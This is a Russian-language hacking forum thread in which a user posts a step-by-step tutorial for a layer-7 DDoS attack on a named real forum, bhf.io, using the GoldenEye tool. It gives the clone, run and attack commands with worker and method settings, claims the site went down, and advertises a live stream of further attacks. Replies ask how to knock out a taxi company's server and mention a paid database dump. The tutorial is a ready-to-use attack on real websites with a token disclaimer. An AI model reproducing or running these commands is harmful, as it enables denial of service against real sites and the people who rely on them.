Salander

0 /dev/null
32
52
25 Май 2018


Народ! Сегодня мы будем ддосить форум bhf.io, с помощи пары слабеньких серверов на linux.
Крайне успешно!
Если данная тема зайдет, а это я увижу по вашим отзывам. То я буду ее развивать! Когда вы дочитаете данную тему, вы и сами сможете пожить 95% сайтов.

Для сегодняшней DDos-атаки, нам понадобиться софт GoldenEye. Ссылка Для просмотра ссылки Войди или Зарегистрируйся, написан на Python соответственно работать будет как на Linux так и на Windos. Но лично я рекомендую linux, да бы не "встревать" в ограничения винды.
Все действия далее я буду выполнять на Debian 9, 2хVPS(2cpu 2.2ghz, 8ram, HDD 25). На самом деле подойдет сервер на много слабее моих. Для BHF например достаточно 1 такого.

И так, по порядку:

1. Скачиваем на сервер(-а) GoldenEye: Для просмотра ссылки Войди или Зарегистрируйся :
Bash:
# если не установлен git, выполняем команду apt install git

git clone https://github.com/jseidl/GoldenEye



2. После скачивания переходим в папку GoldenEye:
Bash:
cd ./GoldenEye



3. Запускаем GoldenEye для просмотра всех возможных ключей:
Bash:
python goldeneye.py
или
./goldeneye.py

Видим примерно следующее(Для вас перевел):
Код:
USAGE: ./goldeneye.py <url> [OPTIONS]



OPTIONS:

    Flag           Description                     Default

    -u, --useragents   Использовать файл с useragents        (По умолчанию: Генерируются случайным образом)

    -w, --workers      Number of concurrent workers                     (По умолчанию: 50)

    -s, --sockets      Number of concurrent sockets                     (По умолчанию: 30)

    -m, --method       HTTP метод для атаки  'get' или 'post'  или 'random'  (По умолчанию: get)

    -d, --debug      Включает режим отладки(Полноценный лог атаки)       (По умолчанию: False)

    -n, --nosslcheck   Не проверять SSL                   (По умолчанию: True)




4. Для того что б положить bhf.io нам потребуется: 140 воркеров ( Предел для моего сервера ), и метод атаки random.
Команда будет выглядеть следующим образом:
Bash:
./goldeneye.py 'https://bhf.io' -w 140 --method random

или

python goldeneye.py 'https://bhf.io' -w 140 --method random




5. Profit, после запуска web сервер сходит с ума и мы получаем 502(чаще всего) ошибку.


Сейчас я показал вам и описал DDos атаку с помощью скрипта GoldenEye, и применил его на практике на довольно крупном форуме.
Мы с вам увидели атаку D(D)os Layer 7, она направлена на отказ в обслуживании клиентов. То есть, мы атакуем веб-сайт до тех пор, пока у него не закончатся ресурсы.
Обычно если такую атаку прекратить то сайт сразу же "приходит в себя".
Обычно она проходит с тысячи взломанных устройств, но сегодня я показал как Ддосить буквально с 1 дешевого сервера.

Удачи вам! Статья естественно для ознакомления :eek:
 

Salander

0 /dev/null
32
52
25 Май 2018

Salander

0 /dev/null
32
52
25 Май 2018
Через 40 минут стрим, с DDos-атакой на сайты в Прямом эфире!
Без цензуры, вы сможете повторить за нами и у вас все получится.​
[automerge]1547023576[/automerge]
Стрим уже начался!

Для просмотра ссылки Войди или Зарегистрируйся
 
Последнее редактирование:

carlcox

Местный
245
126
27 Ноя 2017
Слушай бро, это все занимательно но вот еслибы хайды с этого форума можно было бы посмотреть !Так то дамп бхо лежит на одном из форумов ! платно правда
Вот предлогаю положить таксишный сервак как это сделать ?
Надо чем-то снифать трафф ?
 

FreakFGPW

Психованный фрик
165
134
11 Янв 2019
Salander какой смысл кого-то ддосить если с этого выгоды никакой, одни затраты на сервера + время потеряное на их настройку?
 

Salander

0 /dev/null
32
52
25 Май 2018
Salander какой смысл кого-то ддосить если с этого выгоды никакой, одни затраты на сервера + время потеряное на их настройку?

Сервера предоставлены друзьями, настройку провожу 1(го) сервера за 5 минут и потом просто снимки системы "размножаю".
[automerge]1547226837[/automerge]
Вообщем, не теряю ни рубля.
 

FreakFGPW

Психованный фрик
165
134
11 Янв 2019
Сервера предоставлены друзьями, настройку провожу 1(го) сервера за 5 минут и потом просто снимки системы "размножаю".
[automerge]1547226837[/automerge]
Вообщем, не теряю ни рубля.
Теряешь время, которое в разы дороже рубля